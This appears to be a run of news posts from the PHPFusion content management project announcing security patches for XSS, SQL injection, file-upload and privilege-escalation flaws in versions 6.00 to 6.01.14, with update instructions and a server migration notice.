I'm pleased to announce the availability of PHPFusion v6.01.14. An XSS vulnerability patch is available for v6.01.13 - procedure as usual. Simply download the update package, overwrite the affected files and click the upgrade button under System Admin. If you are running an earlier version of 6.01.xx, you need to apply the previous updates before utilizing this patch. The full SourceForge package and the SVN have been updated as well: PHPFusion 6.01.14 Update - for v6.01.13 only (1,58 K. PHPFusion 6.01.14 (2.04 M. Updated 19/04/2008: A minor error has been fixed - please refer to the comments for details.

Updated 15 July 2007: The update mentioned below caused the lost password function to fail. This has now been corrected, the fixed lostpassword.php can be found in the 6.01.11 upgrade package. Original news: A secunia advisory has brought to my attention an XSS in the FUSION_QUERY string. In order to fix this I have opted to use some v7 code. All users are strongly encouraged to keep their setups as up-to-date as possible, stop slacking! (Joke). Existing v6.01.10 users can download the file '6.01.11 Update for v6.01.10 and simply upload the inluded files and click upgrade under System Admin. The full sourceforge package has also been updated. Manual updaters can find the fix details in the CVS. PHPFusion 6.01.11 Update FOR V6.01.10 ONLY (6Kb). PHPFusion 6.01.11 (2.04Mb).

It seems some people have been having trouble with image uploading since the update to v6.01.10. I have been working to resolve this issue and have discovered that the use of the html_entity_decode() function has been causing images to fail thus not uploading. This issue has now been addressed and if you are having problems simply re-apply the patch below. Original news item: Just when you thought Friday the 13th could pass without any problems, a new exploit has been reported by CodeRS. A slight flaw has been discovered in the verify_image() function used to ensure that images do not contain malicious code. But, don't panic, because I am pleased to report that this problem has been addressed and a patch is now available for download (v6.01.10). All users are advised to upgrade immediately. We remain fully committed to the security of our CMS and will continue to fix problems should they arise as quickly as possible. Existing v6.01.9 users can download the file '6.01.10 Update for v6.01.9 and simply upload the included files and click upgrade under System Admin. if you are running an earlier version of 6.01.x you will first need to apply the previous updates first. The full sourceforge package has been updated. PHPFusion 6.01.10 Update FOR V6.01.9 ONLY (10Kb). PHPFusion 6.01.10 (2.04Mb).

It has come to our attention that hackers are currently targeting PHPFusion sites that are using a few infusions which are open to the union exploits. These include, arcade (starglowone.com) and toplist (rll.dk). If you are using either of these infusions, we strongly recommend that you get the latest versions from the above-mentioned website. Alternatively you should disable these infusions. Please note: infusions provided by third parties are not guaranteed by the development team. Unfortunately, we do not have the time it takes to test every infusion that becomes available for PHPFusion. We cannot be held responsible for the actions of these mindless hackers. This site deals only with core issues, so discussions regarding issues with mods or infusions should be placed on the official mod site. Thanks.

In the last 48 hours a few XSS exploits have been reported. There are three files affected including edit_profile.php, print.php and forum/postify.php. For details of the exact updates please refer to the CVS. Thanks goes to K_ros for his co-operation and information Existing v6.01.6 users can download the file '6.01.7 Update for v6.01.6 and simply upload the inluded files and click upgrade under System Admin. The full sourceforge package has been updated. PHPFusion 6.01.7 Update FOR V6.01.6 ONLY (6Kb). PHPFusion 6.01.7 (2.04Mb).

In recent days it has been brought to my attention that there may be a possible exploit in the extraction of certain super global arrays in maincore.php. It depends on three things: the PHP version your host is using and registar globals is set to off and magic_quotes_gpc is set to off. It is strongly recommended that you update to ensure the security of your site. Just to clarify, is has been suggested on one site that there is an issue with the two admin files panels.php and panel_editor.php and maintenance.php. There are absolutely no problems with these files. All admin files utilise the same security protocols and cannot be tampered with by anyone without admin access. Existing v6.01.4 users can download the file '6.01.5 Update for v6.01.4' and simply upload the inluded files and click upgrade under System Admin. The full sourceforge package has been updated. PHPFusion 6.01.5 Update FOR V6.01.4 ONLY (9Kb). PHPFusion 6.01.5 (2.04Mb). maincore.php update details

The Fusion Server will be going offline sometime within the next 24 to 48 hours while we migrate to a new server. The server we are currently on requires maintenance and to ensure a smooth transition with no issues we are just moving to a new server with a different administration system for the server itself. If at any time you cannot access the website its due to us working on the DNS or server itself. If DNS fails use 69.50.235.29 to access this website. We would apreciate your patience in this matter. Update: Account transfers are taking place. Fusion UK has been transfered and themes will be transfered tommorow. Thanks Sheldon -Netriox

It's now become quite obvious that the current messages.php has more holes than I can fix. Therefore I am scrapping the entire script with a complete rewrite under way. For your site's protection I recommend that you remove messages.php from your server as hacking groups are targeting this scripts hole to hijack admin accounts. I am working as fast as possible and should have a newly coded messages.php script ready within 48 hours. The messages.php will work in all v6 installations. I apologise for any inconvenience caused by this issue.

It's just cursed, messages.php has yet another security issue (I've lost count now). Well, not to worry, an Italian support member, lnx85, has produced a fix. I have updated the two sourceforge packages and added the fixed file to patch 307, so this file is for existing users only. I fully intend to replace this script once v6.00.4 is released. Please make sure you update asap. · Download messages.php · Download PHPFusion 6.00.307 Update for v6.00.305 (24Kb). · Download PHPFusion 6.00.307 Update for v6.00.306 (12Kb).

A new exploit has been revealed by rgod. It allows php files to be uploaded as avatars by allowing multiple file extensions. I have addressed this issue and have released updates for v6.00.305 and v6.00.306. We also have received information relating to locale file inclusion, but this is more down to 3rd party code. Please Read More for details. Existing v6.00.305/6 users can download the file '6.00.307 update for v6.00.305/6'. If you are using an earlier 6.00.3 version ensure you upgrade to v6.00.305 before applying this update. Simply upload the inluded files and click upgrade under System Admin. The Sourceforge packages have also been updated as usual. Click Read more for manual update details. Download PHPFusion 6.00.307 Update for v6.00.305 (13Kb). Download PHPFusion 6.00.307 Update for v6.00.306 (3Kb).

I was hoping to keep this fix silent until the release of v6.00.400, but it has come to my attention that some people have discovered it. The exploit affects forum attachments, similar to the avatar exploit fixed in v6.00.305, so I would prefer not to release the exact details. I have adapted the new attachment code for v6.00.306 and you can download it now. Existing v6.00.305 users can download the file '6.00.306 update for v6.00.305'. If you are using an earlier 6.00.3 version ensure you upgrade to v6.00.305 before applying this update. Simply upload the inluded files and click upgrade under System Admin. The Sourceforge packages have also been updated as usual. If you wish to update manually please refer to the forum thread Manual update for v6.00.306. Update: There was a minor error in the downloads which prevents attachments from working. This has now been corrected, simply reupload the files contained in the update zip. Sorry about that. Download PHPFusion 6.00.306 Update for v6.00.305 (13Kb).

With more holes than a domestic sieve, messages.php has had yet another xss exploit discovered and fixed. This script has caused countless problems (I didn't write it, CrappoMan did) and it may be time for us to scrap it and start afresh. Anyway, for now I have added a fix which you can get from the cvs. Normally we'd release a patch but with v6.00.4 near completion there is little point. I have updated the two sourceforge packages, so this file is for existing users only. Download messages.php

Files Updated: I've discovered two potential problems in infusions -> shoutbox_panel -> shoutbox_archive.php and the new news.php script. For some reason I neglected to sanitise the $rowstart variable, thats what you get for doing too much work! I've been notified about 3 exploits, 2 discovered by Yichen Xie and another reported by Secunia. Yichen Xie has discovered an exploit in lostpassword.php which allows a registered user to gain super admin access by minipulating the url. Yichen has also found that users can delete all messages again by minipulating the url. Finally, Secunia has informed us of an exploit in submitted news/articles due improperly sanitised input. I'm pleased to say that I have addressed all of these issues and have released an immediate update. All v6.00.2 users are strongly advised to update ASAP. The sourceforge package has also been updated. Existing users can update your system by uploading the contents of the file 6-00-205up zip to your server, then click Upgrade under System Admin. If you prefer to add the fixes manually please click Readmore for instructions. Download v6.00.205 update (26Kb).

Following a Secunia advisory (PHPFusion "msg_send" SQL Injection Vulnerability) I have released an updated messages.php script for existing PHPFusion v6.00.1xx setups. Input passed to the "msg_send" parameter in "messages.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The sourceforge package has been updated to include the above fix. Download Messages Security Patch (10Kb). Updated The fix did not account for the $msg_send variable being blank therefore preventing the use of the write new message button. This has now been rectified. Sorry for any inconvenience caused.

Another XSS exploit has been discovered that allows a malicious user to steal your cookie. Thankfully it was rather easy to fix, thanks to the help of CrappoMan and me. The fix is available as a separate patch (6-00-108up.zip) and has been added to the sourceforge files. Patch 6-00-108 upgrades both version 6.00.106 or 6.00.107. If you wish to update manually please click read more for details. Thanks to ratboy and pacifico for their information. This patch also contains some more corrections in messages.php following a security advisory from gnucitizen. Download 6-00-108.zip 11Kb. Update: There was a small mistake in maincore.php and messages.php in the update package. It has been corrected, please re-download and re-apply the package or fix the problem manually as instructed in the comments of this news item.